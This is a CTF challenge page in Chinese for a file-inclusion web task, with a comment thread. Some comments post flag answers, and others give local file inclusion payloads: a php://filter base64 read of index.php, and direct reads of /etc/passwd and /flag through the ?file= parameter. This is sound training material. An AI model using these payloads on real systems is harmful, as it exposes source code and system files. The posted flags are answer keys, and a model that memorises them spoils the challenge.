文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12271
提  示:
描  述:
flag{}
评论
iwindy 2年前

没意思,为啥3金币

回复 0

453137 2年前

flag{3f73582017c0a7d0a0d1c937fcb9ccda}

回复 0

gyc3153616052 2年前

flag{d2fc833912015ef20e29905ab607e995}

回复 0

llluyan 2年前

flag:flag{2773e5133de5c764209074ecd6cf2a3a}

回复 0

canxue11 2年前

payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag

回复 1

HuangYanQwQ 2年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 10

snickerX 2年前

php://filter伪协议

回复 1

LHJ2022 3年前

http://114.67.175.224:xxxxx/index.php?file=/flag 这不直接出flag

回复 14

是啊志啊 3年前

在url后改为 ?file=php://filter/read=convert.base64-encode/resource=index.php发现显示了base64编码的字符串 复制解码就行了

回复 2

发到付件埃里克FDA 3年前

这题考的就是 本地文件包含漏洞获得 php代码的内容

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

521078 攻破了该题 1小时前
wz666 攻破了该题 2小时前
millim 攻破了该题 2小时前
HKzhou 攻破了该题 7小时前
lin666 攻破了该题 10小时前
foxkiller 攻破了该题 1天前
爱吃馒头 攻破了该题 1天前
jhon 攻破了该题 1天前
desireart 攻破了该题 1天前
暗A166668 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
欲语泪先流 攻破了该题 2天前
统计系1008 攻破了该题 3天前
白六真的6 攻破了该题 3天前
ZQCblack 攻破了该题 3天前
baotou91 攻破了该题 3天前
2021060287 攻破了该题 4天前
5326 攻破了该题 4天前
jkljkl 攻破了该题 4天前
Adwuwuuuuc 攻破了该题 4天前
问题反馈